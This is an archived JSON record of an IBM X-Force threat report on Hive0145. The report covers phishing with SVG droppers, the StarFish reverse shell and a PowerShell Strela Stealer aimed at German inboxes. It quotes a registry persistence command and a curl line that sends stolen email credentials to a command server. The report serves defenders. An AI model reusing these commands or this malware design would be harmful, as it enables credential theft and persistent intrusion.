{
	"id": "99dc087c-df00-4eb0-8427-600f8a7eee7a",
	"created_at": "2026-04-06T01:30:12.54923Z",
	"updated_at": "2026-04-10T13:12:41.211947Z",
	"deleted_at": null,
	"sha1_hash": "46f7701738004eb887395460266978cf31cec181",
	"title": "Hive0145 back in German inboxes with Strela Stealer and a backdoor",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1082292,
	"plain_text": "Hive0145 back in German inboxes with Strela Stealer and a\r\nbackdoor\r\nBy Golo Mühr, Chris Caridi\r\nPublished: 2025-07-10 · Archived: 2026-04-06 00:17:44 UTC\r\nAs of early June 2025, IBM X-Force observed new phishing campaigns attributed to Hive0145. This threat actor\r\nis known for their delivery of Strela Stealer to exfiltrate email credentials since at least 2022. Hive0145's latest\r\ncampaigns targeting Germany make use of malicious SVG files to download a simple reverse shell that X-Force\r\nnamed StarFish. The StarFish script supports persistent access and the deployment of follow-on payloads for the\r\nfirst time. This new capability marks a clear shift in intent for the threat actor and translates into a higher risk for\r\nvictims in comparison to previous campaigns. Among the observed secondary payloads were a screenshot module\r\nand a PowerShell-based implementation of Strela Stealer.\r\nHive0145 continues to target Germany in high-volume phishing campaigns through June and July 2025\r\nAs of June 2025, Hive0145 uses SVG files to drop a reverse shell malware, StarFish, enabling persistent\r\naccess to infected machines\r\nAmong the secondary payloads, X-Force discovered a screenshot module and a PowerShell-based\r\nimplementation of Strela Stealer\r\nX-Force first began observing heightened activity from Hive0145 in April 2023. This threat actor is assessed to be\r\nfinancially motivated and is likely functioning as an initial access broker (IAB). Hive0145 stands out from the\r\nthreat landscape due to its evolving techniques and tightly limited scope of actions on the objective, with a central\r\nfocus on email credentials. The group is believed to be the exclusive operator of Strela Stealer–a credential-harvesting malware designed to extract login information from Microsoft Outlook and Mozilla Thunderbird.\r\nAlthough the malware has been implemented in C, .NET and now PowerShell, the original functionality has not\r\nchanged. 
This kind of data theft often sets the stage for Business Email Compromise (BEC) attacks.\r\nIABs like Hive0145 play a crucial role in the cyber criminal ecosystem by acquiring and selling access to\r\ncompromised environments. They typically offload stolen credentials and other valuable data to third-party actors\r\nwho specialize in other aspects of the attack chain. While this is standard practice for IABs, it remains unclear\r\nwhether Hive0145 is aligned with any specific buyers or affiliates when distributing access gained through their\r\noperations.\r\nPrevious activity\r\nHive0145’s activity began in late 2022 with basic phishing campaigns delivering Strela Stealer via malicious\r\nemail attachments. These early efforts primarily targeted Spanish-speaking users and focused on credential theft\r\nfrom Outlook and Thunderbird. The emails used generic invoice lures and relied on basic social engineering\r\ntactics.\r\nhttps://www.ibm.com/think/x-force/hive0145-back-in-german-inboxes-with-strela-stealer\r\nPage 1 of 12\n\nBy early 2023, Hive0145 expanded its targeting to include users in Germany and Italy. These campaigns showed\r\nimproved localization, using translated lures and more region-specific content. The malware delivery remained\r\nattachment-based, but the phishing emails grew more tailored to increase credibility. Around mid-2024, the actor\r\nshifted to a more advanced technique: hijacking legitimate invoice emails. They would manipulate real stolen\r\nemails and replace original attachments with weaponized ZIP files containing obfuscated JavaScript loaders.\r\nIn late 2023 and early 2024, Hive0145 incorporated polyglot files, valid code-signing certificates and new crypters\r\nlike Stellar Loader to improve evasion. The targeting expanded further to include systems with Catalan, Polish and\r\nBasque locales, showing broader regional intent. 
By mid-2024, campaigns became more frequent and structured,\r\nwith Hive0145 launching phishing waves on a near-weekly basis. Ukrainian targets were added to the scope, and\r\nStrela Stealer was updated to collect system metadata and application inventories, signaling a shift toward more\r\ncomprehensive reconnaissance alongside credential theft.\r\nIn early June 2025, X-Force observed another Hive0145 email phishing campaign targeting Germany. The threat\r\nactors used real emails, likely stolen from previous infections, along with the corresponding attachment name. The\r\nattachment file type is changed to .SVG (scalable vector graphic), but it retains the original filename to maintain\r\nthe appearance of authenticity. All emails successfully pass an SPF (Sender Policy Framework) check, suggesting\r\nthat the emails are indeed being sent from a legitimate domain and not being spoofed. The vast majority of emails\r\nand attachment names contain the word \"Rechnung\" in the German language (translates to \"Invoice\") and were\r\ndated between January and May 2025.\r\nFig. 1: Real invoice email with hijacked attachment (SVG) used in Hive0145 phishing campaign\r\nThe initial campaign lasted from June 4th until June 19th and used SVG files with embedded HTML to download\r\na ZIP file containing a malicious JScript (JS). The first wave only used a handful of different download domains in\r\nthe malicious SVG droppers, all of which were taken down shortly after the campaign began, which likely limited\r\nthe number of successful downloads.\r\nFig. 2: Hive0145 campaigns targeting Germany in June and July 2025\r\nOn July 3rd, Hive0145 returned with a high-volume campaign featuring a significantly larger pool of malicious\r\ndomains. 
\r\nIf the victim opens the SVG file on their machine, the browser will render the embedded HTML:\r\nFig. 3: Rendered SVG file\r\nThe HTML displays a progress bar and loads a remote script responsible for downloading a ZIP file:\r\nFig. 4: Embedded HTML loading remote script\r\nThe dropped ZIP file uses a name to suggest it contains the document a victim would expect. Instead, it contains\r\nan obfuscated JScript file which implements a simple reverse shell called StarFish. This is the first time that\r\nHive0145 was observed deploying backdoor malware and demonstrates a clear change in intent with the new\r\ncapability to deploy arbitrary payloads.\r\nStarFish reverse shell\r\nUpon execution, the StarFish script generates a unique victim ID by combining the machine's product ID and\r\ncomputer name. It then sends an HTTP GET request to a hardcoded command and control (C2) server's\r\n\"server.php\" endpoint. The server responds with the string \"OK\", immediately followed by an optional command,\r\nwhich is directly executed on the machine via cmd.exe. Should the command contain the placeholder string\r\n\"%SCRIPT_NAME%\", it will be replaced with the reverse shell's path. The output of the command is sent back as\r\na POST request after command completion or a specified maximum time limit.\r\nThe first C2 command is always aimed at achieving persistence for the reverse shell through the registry:\r\nREG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"System Update2\" /t REG_SZ /F\r\n/D \"wscript.exe \"\"%SCRIPT_NAME%\"\"\r\nStarFish continues to request new commands every 48 seconds. 
The final Strela Stealer payload is only dropped\r\nafter passing anti-sandbox checks, including an extended time of constant beaconing and a successful screenshot\r\ncapture.\r\nScreen capture\r\nAfter several minutes of beaconing, the next stage is executed: a PowerShell script named \"sc.ps1\" downloaded\r\nfrom the same server.\r\nFig. 5: Screen capture PowerShell script\r\nThe script takes a screenshot of the victim's current screen and attempts to upload it to the 0x0 free file hoster\r\n(https://git.0x0.st/mia/0x0). After a successful upload, the file hoster sends back a unique URL to view the\r\nscreenshot, which is relayed back to the C2 server via the reverse shell.\r\nStrela Stealer PowerShell edition\r\nThe final payload is another PowerShell script downloaded from the server's \"strel.php\" endpoint. The script is a\r\ndirect implementation of the original Strela Stealer behavior as observed in all past Hive0145 campaigns. The\r\nStealer attempts to extract, decrypt and exfiltrate email inbox credentials from the Thunderbird and Microsoft\r\nOutlook email clients.\r\nFig. 6: Excerpt of Strela Stealer PowerShell script\r\nAny credentials are stored in a temporary file and exfiltrated via the curl command to the server's \"up2.php\"\r\nendpoint.\r\ncurl.exe -X POST --data-binary \"@$tempFile\" $headerArgs $Uri -s -S 2\u003e\u00261\r\nX-Force also observed the \"invoice.php\" endpoint on the C2 server attempting to download or display a PDF,\r\n\"invoice.pdf\". This is likely used as a decoy measure and has been observed in previous Strela Stealer campaigns\r\norchestrated by Hive0145.\r\nHive0145 is a highly capable threat actor showing a strong motivation to adapt over the past years. 
With the latest\r\ncampaign's shift towards backdoor malware with persistent access, the threat actor demonstrates clear intent and\r\ncapability to evolve repeatedly and increase their scope outside of traditional email credential harvesting. The\r\nrefinement in the infection process, which now deploys Strela Stealer only after prolonged beaconing and screen\r\ncapture, underscores the increasing intent of the threat actor to evade analysis and research of later-stage payloads.\r\nLastly, Hive0145's unique approach to phishing is likely one of the main keys to its success, enabling high-volume\r\ncampaigns across targeted geographies.\r\nX-Force recommends organizations:\r\nExercise caution with emails and ZIP archive attachments\r\nEmploy detection rules for malicious SVG files that execute JavaScript and drop further payloads\r\nConsider changing the default application for JavaScript/JScript/VBScript files to Notepad\r\nMonitor curl.exe processes potentially exfiltrating data\r\nInstall and configure endpoint security software\r\nUpdate relevant network security monitoring rules\r\nEducate staff on the potential threats to the organization\r\nIndicators\r\nThe source report lists indicators for the Strela Stealer C2 server, the Hive0145 domains used for staging, and two example SHA256 hashes of the StarFish reverse shell on VirusTotal.\r\nSource: https://www.ibm.com/think/x-force/hive0145-back-in-german-inboxes-with-strela-stealer",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.ibm.com/think/x-force/hive0145-back-in-german-inboxes-with-strela-stealer"
	],
	"report_names": [
		"hive0145-back-in-german-inboxes-with-strela-stealer"
	],
	"threat_actors": [
		{
			"id": "28349be5-ce76-4a45-9502-707953dd2f07",
			"created_at": "2025-05-29T02:00:03.210059Z",
			"updated_at": "2026-04-10T02:00:03.86427Z",
			"deleted_at": null,
			"main_name": "HIVE-0145",
			"aliases": [
				"Hive0145"
			],
			"source_name": "MISPGALAXY:HIVE-0145",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439012,
	"ts_updated_at": 1775826761,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/46f7701738004eb887395460266978cf31cec181.pdf",
		"text": "https://archive.orkl.eu/46f7701738004eb887395460266978cf31cec181.txt",
		"img": "https://archive.orkl.eu/46f7701738004eb887395460266978cf31cec181.jpg"
	}
}